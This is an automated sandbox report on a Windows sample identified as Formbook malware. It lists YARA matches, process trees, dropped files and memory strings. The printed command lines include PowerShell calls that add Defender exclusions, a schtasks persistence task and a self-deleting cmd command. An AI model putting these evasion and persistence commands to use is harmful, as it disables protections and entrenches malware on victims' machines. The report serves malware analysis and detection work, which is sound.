Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Ms5nQdSz5l.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: zFVxYeAVOjnwuB.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@19/19@2/1

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File created: C:\Users\user\AppData\Local\Temp\tmp7635.tmp

Jump to behavior

Source: Ms5nQdSz5l.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: Ms5nQdSz5l.exe

Virustotal: Detection: 26%

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File read: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Ms5nQdSz5l.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Ms5nQdSz5l.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Ms5nQdSz5l.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Ms5nQdSz5l.exe, 00000009.00000003.243388587.0000000000F30000.00000004.00000001.sdmp, mstsc.exe, 00000017.00000002.506619622.0000000004F60000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Ms5nQdSz5l.exe, mstsc.exe
Source:	Binary string: mstsc.pdbGCTL source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: Ms5nQdSz5l.exe, 00000009.00000002.389539524.0000000002FA0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.350623298.000000000F5A0000.00000002.00000001.sdmp

Source: Ms5nQdSz5l.exe

Static PE information: 0xDA32965F [Tue Jan 1 18:33:03 2086 UTC]

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041D0D2 push eax; ret	9_2_0041D0D8
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041D0DB push eax; ret	9_2_0041D142
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041D085 push eax; ret	9_2_0041D0D8
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041D13C push eax; ret	9_2_0041D142
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041D9B9 push ss; ret	9_2_0041D9BF
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0040E29B pushfd ; retf	9_2_0040E2A2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_00404443 push cs; ret	9_2_00404449
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0041E586 push esp; ret	9_2_0041E587
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0114D0D1 push ecx; ret	9_2_0114D0E4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_04FDD0D1 push ecx; ret	23_2_04FDD0E4
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AED085 push eax; ret	23_2_00AED0D8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AED0DB push eax; ret	23_2_00AED142
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AED0D2 push eax; ret	23_2_00AED0D8
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AED9B9 push ss; ret	23_2_00AED9BF
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AED13C push eax; ret	23_2_00AED142
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00ADE29B pushfd ; retf	23_2_00ADE2A2
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AD4443 push cs; ret	23_2_00AD4449
Source: C:\Windows\SysWOW64\mstsc.exe	Code function: 23_2_00AEE586 push esp; ret	23_2_00AEE587

Source: initial sample	Static PE information: section name: .text entropy: 7.5188778941
Source: initial sample	Static PE information: section name: .text entropy: 7.5188778941

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE3

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
